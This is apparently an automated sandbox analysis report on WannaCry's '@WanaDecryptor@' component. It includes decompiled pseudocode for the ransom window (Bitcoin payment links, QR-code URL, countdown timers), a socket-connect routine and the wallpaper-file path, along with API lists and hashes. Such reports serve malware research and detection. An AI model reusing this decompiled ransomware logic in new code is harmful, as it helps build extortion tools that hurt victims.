API calls 6157 4035a0 SendMessageA 6158 4035e5 OpenClipboard 6157->6158 6159 4037e9 6157->6159 6158->6159 6160 4035f7 SendMessageA 6158->6160 6161 403681 GlobalAlloc 6160->6161 6162 40360f #3301 #924 #800 #800 SendMessageA 6160->6162 6163 4037e3 CloseClipboard 6161->6163 6164 40369b GlobalLock 6161->6164 6162->6161 6162->6162 6163->6159 6165 4036b6 SendMessageA 6164->6165 6166 4036aa GlobalFree 6164->6166 6167 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6165->6167 6169 4036d6 8 API calls 6165->6169 6166->6163 6167->6163 6170 4037bf 6169->6170 6170->6167 6363 404aa3 6364 404ab1 6363->6364 6365 404aaa GlobalFree 6363->6365 6366 404ac0 6364->6366 6367 404ab9 CloseHandle 6364->6367 6365->6364 6367->6366 5622 407db0 5629 401000 #324 #567 5622->5629 5624 407dd7 time 5625 407e09 #2514 5624->5625 5626 407dfe 5624->5626 5627 407e34 #765 #641 5625->5627 5628 407e28 time 5625->5628 5626->5625 5628->5627 5629->5624 6063 407cb0 6066 4030e0 #324 #567 #567 6063->6066 6065 407cd6 6 API calls 6066->6065 6368 40ceb0 6369 40cebc 6368->6369 6370 4130bb 2 API calls 6369->6370 6371 40ceda 6370->6371 6373 4102b0 calloc

                                  Executed Functions

                                  Function 00406F80 Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536windowtimeCOMMONCrypto
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 406f80-407117 call 4076a0 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateFontA #1641 CreateFontA #1641 CreateFontA #1641 #3092 3 407119 0->3 4 40711c-40713b SendMessageA #3092 0->4 3->4 5 407141 4->5 6 40713d-40713f 4->6 7 407144-40715d SendMessageA #3092 5->7 6->7 8 407163 7->8 9 40715f-407161 7->9 10 407166-40717f SendMessageA #3092 8->10 9->10 11 407181-407183 10->11 12 407185 10->12 13 407188-4071a1 SendMessageA #3092 11->13 12->13 14 4071a3-4071a5 13->14 15 4071a7 13->15 16 4071aa-4071c3 SendMessageA #3092 14->16 15->16 17 4071c5-4071c7 16->17 18 4071c9 16->18 19 4071cc-4071e5 SendMessageA #3092 17->19 18->19 20 4071e7 19->20 21 4071ea-407203 SendMessageA #3092 19->21 20->21 22 407205-407207 21->22 23 407209 21->23 24 40720c-407225 SendMessageA #3092 22->24 23->24 25 407227-407229 24->25 26 40722b 24->26 27 40722e-407247 SendMessageA #3092 25->27 26->27 28 407249-40724b 27->28 29 40724d 27->29 30 407250-407269 SendMessageA #3092 28->30 29->30 31 40726b 30->31 32 40726e-407638 SendMessageA #860 call 404260 * 4 #537 call 404210 #537 call 404210 #540 #2818 #535 call 404210 call 404270 #2818 #535 call 404210 SendMessageA * 2 #6140 * 2 call 405820 call 405800 call 405200 call 405920 call 405860 call 4058c0 call 405990 call 405180 call 405820 call 405800 call 405200 call 405920 call 405860 call 4058c0 call 405990 call 405180 GetTimeZoneInformation call 401e60 SystemTimeToTzSpecificLocalTime #2818 call 401e60 SystemTimeToTzSpecificLocalTime #2818 #6334 #800 30->32 31->32
                                  C-Code - Quality: 62%
                                  			E00406F80(void* __ecx, void* __fp0) {
				struct HFONT__* _t135;
				long _t137;
				long _t138;
				long _t139;
				long _t141;
				long _t142;
				long _t143;
				long _t145;
				long _t146;
				long _t147;
				long _t149;
				void* _t214;
				int _t216;
				int _t235;
				int _t238;
				int _t240;
				int _t242;
				int _t245;
				int _t248;
				int _t251;
				int _t253;
				void* _t260;
				void* _t262;
				int _t339;
				void* _t348;
				int _t352;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t375;

				_t375 = __fp0;
				_push(0xffffffff);
				_push(E00413E9B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0xd4;
				_t348 = __ecx;
				_push(0);
				E004076A0(__ecx);
				_push(CreateSolidBrush(0xe0));
				L00412D5E();
				_push(CreateSolidBrush(0x121284));
				L00412D5E();
				_push(CreateSolidBrush(0xe000));
				L00412D5E();
				_push(CreateSolidBrush(0xe00000));
				L00412D5E();
				_push(CreateSolidBrush(0));
				L00412D5E();
				_push(CreateSolidBrush(0x3834d1));
				L00412D5E();
				_push(CreateSolidBrush(0x107c10));
				L00412D5E();
				_push(CreateSolidBrush(0xe8a200));
				L00412D5E();
				_push(CreateSolidBrush(0xd77800));
				L00412D5E();
				_push(CreateSolidBrush(0x3cda));
				L00412D5E();
				_t339 = __ecx + 0x880;
				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t216 = __ecx + 0x888;
				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t352 = __ecx + 0x890;
				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t135);
				L00412D5E();
				_push(0x3ed);
				L00412CE6();
				if(_t339 != 0) {
					_t339 =  *(_t339 + 4);
				}
				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
				_push(0x3fe);
				L00412CE6();
				if(_t216 != 0) {
					_t235 =  *(_t216 + 4);
				} else {
					_t235 = 0;
				}
				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
				_push(0x3fb);
				L00412CE6();
				if(_t216 != 0) {
					_t238 =  *(_t216 + 4);
				} else {
					_t238 = 0;
				}
				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
				_push(0x3ff);
				L00412CE6();
				if(_t352 != 0) {
					_t240 =  *(_t352 + 4);
				} else {
					_t240 = 0;
				}
				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
				_push(0x3fc);
				L00412CE6();
				if(_t352 != 0) {
					_t242 =  *(_t352 + 4);
				} else {
					_t242 = 0;
				}
				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
				_push(0x400);
				L00412CE6();
				if(_t352 != 0) {
					_t245 =  *(_t352 + 4);
				} else {
					_t245 = 0;
				}
				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
				_push(0x3fa);
				L00412CE6();
				if(_t352 != 0) {
					_t352 =  *(_t352 + 4);
				}
				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
				_push(0x402);
				L00412CE6();
				if(_t216 != 0) {
					_t248 =  *(_t216 + 4);
				} else {
					_t248 = 0;
				}
				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
				_push(0x3ef);
				L00412CE6();
				if(_t216 != 0) {
					_t251 =  *(_t216 + 4);
				} else {
					_t251 = 0;
				}
				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
				_push(0x3eb);
				L00412CE6();
				if(_t216 != 0) {
					_t253 =  *(_t216 + 4);
				} else {
					_t253 = 0;
				}
				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
				_push(0x3ec);
				L00412CE6();
				if(_t216 != 0) {
					_t216 =  *(_t216 + 4);
				}
				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
				_push(_t348 + 0x5be);
				L00412DA0();
				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
				_t260 = _t348 + 0x360;
				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
				_push(_t260);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				_t262 = _t348 + 0x228;
				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
				_push(_t262);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
				L00412DA6();
				_push(_t348 + 0x58c);
				_push("mailto:%s");
				_push(_t356 + 0x10);
				 *(_t356 + 0xf8) = 0;
				L00412E00();
				_t357 = _t356 + 8;
				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
				L00412F56();
				E00404210(_t348 + 0x2f8, _t357 + 0x14);
				E00404270(_t348 + 0x888);
				_push( *((intOrPtr*)(_t348 + 0x508)));
				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
				_push(_t357 + 0x10); // executed
				L00412E00(); // executed
				_t358 = _t357 + 8;
				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
				L00412F56();
				E00404210(_t348 + 0x360, _t358 + 0x14);
				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
				_push(0xffffffff);
				_push(2);
				L00412F50();
				_push(0xffffffff);
				_push(2);
				 *( *(_t348 + 0x164)) = 0xe0;
				( *(_t348 + 0x164))[1] = 0xe000;
				L00412F50();
				 *( *(_t348 + 0x1e8)) = 0xe0;
				( *(_t348 + 0x1e8))[1] = 0xe000;
				_t342 = _t348 + 0x3c8;
				E00405820(_t348 + 0x3c8, 1);
				E00405800(_t348 + 0x3c8, 0xb);
				E00405200(_t348 + 0x3c8, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t342, 0xb);
				E004058C0(_t342, 1);
				E00405990(_t342, 1, 0x20);
				E00405180(_t342, "00;00;00;00");
				_t343 = _t348 + 0x444;
				E00405820(_t348 + 0x444, 1);
				E00405800(_t348 + 0x444, 0xb);
				E00405200(_t348 + 0x444, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t343, 0xb);
				E004058C0(_t343, 1);
				E00405990(_t343, 1, 0x20);
				E00405180(_t343, "00;00;00;00");
				GetTimeZoneInformation(_t358 + 0x38); // executed
				_push(_t358 + 0x28);
				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t359 = _t358 + 8;
				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18); // executed
				_push( *(_t359 + 0x24) & 0x0000ffff);
				_push( *(_t359 + 0x22) & 0x0000ffff);
				_push( *(_t359 + 0x20) & 0x0000ffff);
				_push( *(_t359 + 0x1c) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t348 + 0x500);
				L00412E00();
				_push(_t359 + 0x48);
				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t360 = _t359 + 0x28;
				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18); // executed
				_push( *(_t360 + 0x24) & 0x0000ffff);
				_push( *(_t360 + 0x22) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_t214 = _t348 + 0x504;
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t214);
				L00412E00();
				_t361 = _t360 + 0x20;
				_push(0); // executed
				L00412E06(); // executed
				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
				return _t214;
			}





































                                  0x00406f80
                                  0x00406f86
                                  0x00406f88
                                  0x00406f8d
                                  0x00406f8e
                                  0x00406f95
                                  0x00406f9f
                                  0x00406fa1
                                  0x00406fa3
                                  0x00406fb5
                                  0x00406fbc
                                  0x00406fc8
                                  0x00406fcf
                                  0x00406fdb
                                  0x00406fe2
                                  0x00406fee
                                  0x00406ff5
                                  0x00406ffe
                                  0x00407005
                                  0x00407011
                                  0x00407018
                                  0x00407024
                                  0x0040702b
                                  0x00407037
                                  0x0040703e
                                  0x0040704a
                                  0x00407051
                                  0x0040705d
                                  0x00407064
                                  0x00407091
                                  0x00407099
                                  0x0040709c
                                  0x004070c3
                                  0x004070cb
                                  0x004070ce
                                  0x004070f5
                                  0x004070fb
                                  0x00407101
                                  0x00407104
                                  0x00407109
                                  0x00407110
                                  0x00407117
                                  0x00407119
                                  0x00407119
                                  0x0040712b
                                  0x0040712d
                                  0x00407134
                                  0x0040713b
                                  0x00407141
                                  0x0040713d
                                  0x0040713d
                                  0x0040713d
                                  0x0040714d
                                  0x0040714f
                                  0x00407156
                                  0x0040715d
                                  0x00407163
                                  0x0040715f
                                  0x0040715f
                                  0x0040715f
                                  0x0040716f
                                  0x00407171
                                  0x00407178
                                  0x0040717f
                                  0x00407185
                                  0x00407181
                                  0x00407181
                                  0x00407181
                                  0x00407191
                                  0x00407193
                                  0x0040719a
                                  0x004071a1
                                  0x004071a7
                                  0x004071a3
                                  0x004071a3
                                  0x004071a3
                                  0x004071b3
                                  0x004071b5
                                  0x004071bc
                                  0x004071c3
                                  0x004071c9
                                  0x004071c5
                                  0x004071c5
                                  0x004071c5
                                  0x004071d5
                                  0x004071d7
                                  0x004071de
                                  0x004071e5
                                  0x004071e7
                                  0x004071e7
                                  0x004071f3
                                  0x004071f5
                                  0x004071fc
                                  0x00407203
                                  0x00407209
                                  0x00407205
                                  0x00407205
                                  0x00407205
                                  0x00407215
                                  0x00407217
                                  0x0040721e
                                  0x00407225
                                  0x0040722b
                                  0x00407227
                                  0x00407227
                                  0x00407227
                                  0x00407237
                                  0x00407239
                                  0x00407240
                                  0x00407247
                                  0x0040724d
                                  0x00407249
                                  0x00407249
                                  0x00407249
                                  0x00407259
                                  0x0040725b
                                  0x00407262
                                  0x00407269
                                  0x0040726b
                                  0x0040726b
                                  0x00407277
                                  0x00407285
                                  0x00407288
                                  0x0040729f
                                  0x004072b7
                                  0x004072d0
                                  0x004072db
                                  0x004072e8
                                  0x004072ed
                                  0x004072f0
                                  0x004072f9
                                  0x004072fe
                                  0x00407304
                                  0x00407309
                                  0x0040730c
                                  0x00407315
                                  0x00407320
                                  0x00407329
                                  0x00407338
                                  0x00407339
                                  0x0040733e
                                  0x0040733f
                                  0x0040734a
                                  0x0040734f
                                  0x00407358
                                  0x0040735d
                                  0x00407364
                                  0x00407372
                                  0x0040737e
                                  0x0040737f
                                  0x00407384
                                  0x00407385
                                  0x0040738a
                                  0x00407393
                                  0x00407398
                                  0x004073a3
                                  0x004073b8
                                  0x004073ca
                                  0x004073cc
                                  0x004073ce
                                  0x004073d6
                                  0x004073e6
                                  0x004073e8
                                  0x004073ea
                                  0x004073fc
                                  0x004073ff
                                  0x0040740c
                                  0x00407418
                                  0x0040741b
                                  0x00407423
                                  0x0040742c
                                  0x00407435
                                  0x00407442
                                  0x00407449
                                  0x00407452
                                  0x0040745b
                                  0x00407466
                                  0x00407472
                                  0x00407477
                                  0x00407481
                                  0x0040748a
                                  0x00407493
                                  0x004074a0
                                  0x004074a7
                                  0x004074b0
                                  0x004074b9
                                  0x004074c4
                                  0x004074d0
                                  0x004074da
                                  0x004074f3
                                  0x00407503
                                  0x0040750e
                                  0x00407520
                                  0x00407539
                                  0x00407544
                                  0x00407549
                                  0x00407559
                                  0x00407560
                                  0x00407561
                                  0x00407568
                                  0x0040756d
                                  0x0040756e
                                  0x0040757d
                                  0x00407596
                                  0x0040759b
                                  0x004075ad
                                  0x004075c6
                                  0x004075c7
                                  0x004075d6
                                  0x004075e6
                                  0x004075ed
                                  0x004075ee
                                  0x004075ef
                                  0x004075f5
                                  0x004075fa
                                  0x004075fb
                                  0x00407600
                                  0x00407605
                                  0x00407607
                                  0x00407610
                                  0x0040761b
                                  0x0040762a
                                  0x00407638

                                  APIs
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FBC
                                  • CreateSolidBrush.GDI32(00121284), ref: 00406FC6
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FCF
                                  • CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FE2
                                  • CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00406FF5
                                  • CreateSolidBrush.GDI32(00000000), ref: 00406FFC
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407005
                                  • CreateSolidBrush.GDI32(003834D1), ref: 0040700F
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407018
                                  • CreateSolidBrush.GDI32(00107C10), ref: 00407022
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040702B
                                  • CreateSolidBrush.GDI32(00E8A200), ref: 00407035
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040703E
                                  • CreateSolidBrush.GDI32(00D77800), ref: 00407048
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407051
                                  • CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407064
                                  • CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 0040709C
                                  • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 004070CE
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070FB
                                  • #1641.MFC42(00000000,?,765920C0,?), ref: 00407104
                                  • #3092.MFC42(000003ED,00000000,?,765920C0,?), ref: 00407110
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040712B
                                  • #3092.MFC42(000003FE,?,765920C0,?), ref: 00407134
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040714D
                                  • #3092.MFC42(000003FB,?,765920C0,?), ref: 00407156
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040716F
                                  • #3092.MFC42(000003FF,?,765920C0,?), ref: 00407178
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407191
                                  • #3092.MFC42(000003FC,?,765920C0,?), ref: 0040719A
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071B3
                                  • #3092.MFC42(00000400,?,765920C0,?), ref: 004071BC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071D5
                                  • #3092.MFC42(000003FA,?,765920C0,?), ref: 004071DE
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004071F3
                                  • #3092.MFC42(00000402,?,765920C0,?), ref: 004071FC
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407215
                                  • #3092.MFC42(000003EF,?,765920C0,?), ref: 0040721E
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407237
                                  • #3092.MFC42(000003EB,?,765920C0,?), ref: 00407240
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407259
                                  • #3092.MFC42(000003EC,?,765920C0,?), ref: 00407262
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00407277
                                  • #860.MFC42(?,?,765920C0,?), ref: 00407288
                                  • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,765920C0,?), ref: 004072F9
                                  • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,765920C0,?), ref: 00407315
                                  • #540.MFC42(?,?,?,?,765920C0,?), ref: 00407329
                                  • #2818.MFC42(?,mailto:%s,?,?,?,?,?,765920C0,?), ref: 0040734A
                                  • #535.MFC42(?), ref: 0040735D
                                  • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                  • #535.MFC42(?), ref: 00407398
                                    • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                    • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                  • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                  • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                  • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                    • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                    • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                    • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                    • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                    • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                    • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                    • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                    • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  • GetTimeZoneInformation.KERNELBASE(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                    • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00407520
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 004075AD
                                  • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                  • #6334.MFC42(00000000), ref: 00407607
                                  • #800.MFC42 ref: 0040761B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                  • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                  • API String ID: 28786460-3869059234
                                  • Opcode ID: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                  • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                  • Opcode Fuzzy Hash: 200e83b7d3820b486b06c35be801168636e9bf215e2def9df31dd5cd78b3127c
                                  • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 360 40d6a0-40d6ed htons socket 361 40d6f3-40d711 bind 360->361 362 40d814-40d821 360->362 363 40d717-40d72c ioctlsocket 361->363 364 40d809-40d80b 361->364 363->364 365 40d732-40d789 connect select 363->365 364->362 366 40d80d-40d80e closesocket 364->366 365->364 367 40d78b-40d798 __WSAFDIsSet 365->367 366->362 368 40d79a-40d7aa __WSAFDIsSet 367->368 369 40d7ac-40d806 ioctlsocket setsockopt * 2 367->369 368->364 368->369
                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42); // executed
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
